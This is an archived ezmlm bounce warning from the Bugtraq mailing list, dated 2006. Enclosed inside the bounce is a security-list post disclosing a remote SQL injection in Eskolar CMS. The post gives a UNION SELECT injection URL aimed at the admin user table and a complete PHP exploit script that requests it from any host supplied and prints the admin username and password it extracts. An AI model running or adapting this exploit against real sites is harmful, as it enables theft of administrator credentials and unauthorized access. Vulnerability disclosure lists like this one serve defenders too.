ezmlm warning

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hi! This is the ezmlm program. I'm managing the
bugtraq@xxxxxxxxxxxxxxxxx mailing list.

I'm working for my owner, who can be reached
at bugtraq-owner@xxxxxxxxxxxxxxxxxx

Messages to you from the bugtraq mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.

If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the bugtraq mailing list,
without further notice.

I've kept a list of which messages from the bugtraq mailing list have 
bounced from your address.

Copies of these messages may be in the archive.

To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
   <bugtraq-get.123_145@xxxxxxxxxxxxxxxxx>

To receive a subject and author list for the last 100 or so messages,
send an empty message to:
   <bugtraq-index@xxxxxxxxxxxxxxxxx>

Here are the message numbers:

   27863
   27868
   27869
   27861
   27862
   27864
   27870
   27865
   27866
   27877
   27867
   27878
   27871
   27880
   27879
   27881
   27872
   27874
   27876
   27873
   27875
--- Enclosed is a copy of the bounce message I received.
Return-Path: <>
Received: (qmail 17758 invoked from network); 24 Sep 2006 17:59:56 -0000
Received: from mail.securityfocus.com (205.206.231.9)
  by lists2.securityfocus.com with SMTP; 24 Sep 2006 17:59:56 -0000
Received: (qmail 4575 invoked by alias); 24 Sep 2006 18:20:09 -0000
Received: (qmail 1996 invoked from network); 24 Sep 2006 18:18:23 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
  by mail.securityfocus.com with SMTP; 24 Sep 2006 18:18:23 -0000
Received: by outgoing3.securityfocus.com (Postfix)
	id 400BC23799A; Sun, 24 Sep 2006 11:22:26 -0600 (MDT)
Date: Sun, 24 Sep 2006 11:22:26 -0600 (MDT)
From: MAILER-DAEMON@xxxxxxxxxxxxxxxxx (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="5B85D23705C.1159118531/outgoing3.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20060924172226.400BC23799A@xxxxxxxxxxxxxxxxxxxxxxxxxxx>

This is a MIME-encapsulated message.

--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host outgoing3.securityfocus.com.

I'm sorry to have to inform you that your message could not be
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

			The Postfix program

<list-bugtraq23@xxxxxxxxxxx>: host mail.spinics.net[66.254.95.226] said: 451
    4.1.8 Domain of sender address
    bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx does not
    resolve (in reply to MAIL FROM command)

--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; outgoing3.securityfocus.com
X-Postfix-Queue-ID: 5B85D23705C
X-Postfix-Sender: rfc822; bugtraq-return-27863@xxxxxxxxxxxxxxxxx
Arrival-Date: Fri, 22 Sep 2006 09:16:39 -0600 (MDT)

Final-Recipient: rfc822; list-bugtraq23@xxxxxxxxxxx
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; host mail.spinics.net[66.254.95.226] said: 451
    4.1.8 Domain of sender address
    bugtraq-return-27863-list-bugtraq23=spinics.net@xxxxxxxxxxxxxxxxx does not
    resolve (in reply to MAIL FROM command)

--5B85D23705C.1159118531/outgoing3.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
	by outgoing3.securityfocus.com (Postfix) with QMQP
	id 5B85D23705C; Fri, 22 Sep 2006 09:16:39 -0600 (MDT)
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
Received: (qmail 14880 invoked from network); 22 Sep 2006 06:03:50 -0000
Date: 22 Sep 2006 06:27:12 -0000
Message-ID: <20060922062712.8894.qmail@xxxxxxxxxxxxxxxxx>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: security@xxxxxxxxx
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Eskolar CMS  Remote Sql Injection

Hello,,

Eskolar CMS  Remote Sql Injection

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


Remote Sql injection :-
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*

Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* Eskolar CMS Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* Eskolar CMS Remote sql injection exploit   */
/*     by HACKERS PAL <security@xxxxxxxxx>    */
/*         site: http://www.soqor.net         */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*    php '.$argv[0].' http://localhost/eskolar/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*";
$page=$url.$exploit;
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }
         $i=0;

         function get($var)
         {
          GLOBAL $i;
           $var[1]=trim($var[1]);
          if($i==0)
          {
          Echo "\n[+] User Name : ".$var[1];
         $i++;
          }
          else
          {
          Echo "\n[+] Pass Word : ".$var[1];
                  }


         }

     $page = get_page($page);

     if(!preg_match('/\<tr bgcolor=\'#FF0000\'><td><div align=\'center\'>(.+?)<\/div><\/td><\/tr>/is',$page)||!preg_match('/\<td><a href=\"(.+?)\" target=\"_blank\">(.+?)<\/a> <\/td>/is',$page))
     {
              Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
     }

     preg_replace_callback('/\<tr bgcolor=\'#FF0000\'><td><div align=\'center\'>(.+?)<\/div><\/td><\/tr>/is','get',$page);

     preg_replace_callback('/\<td><a href=\"(.+?)\" target=\"_blank\">(.+?)<\/a> <\/td>/is','get',$page);

              Die("\n/*       Visit us : WwW.SoQoR.NeT             */\n/**********************************************/");
?>
#WwW.SoQoR.NeT

--5B85D23705C.1159118531/outgoing3.securityfocus.com--

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux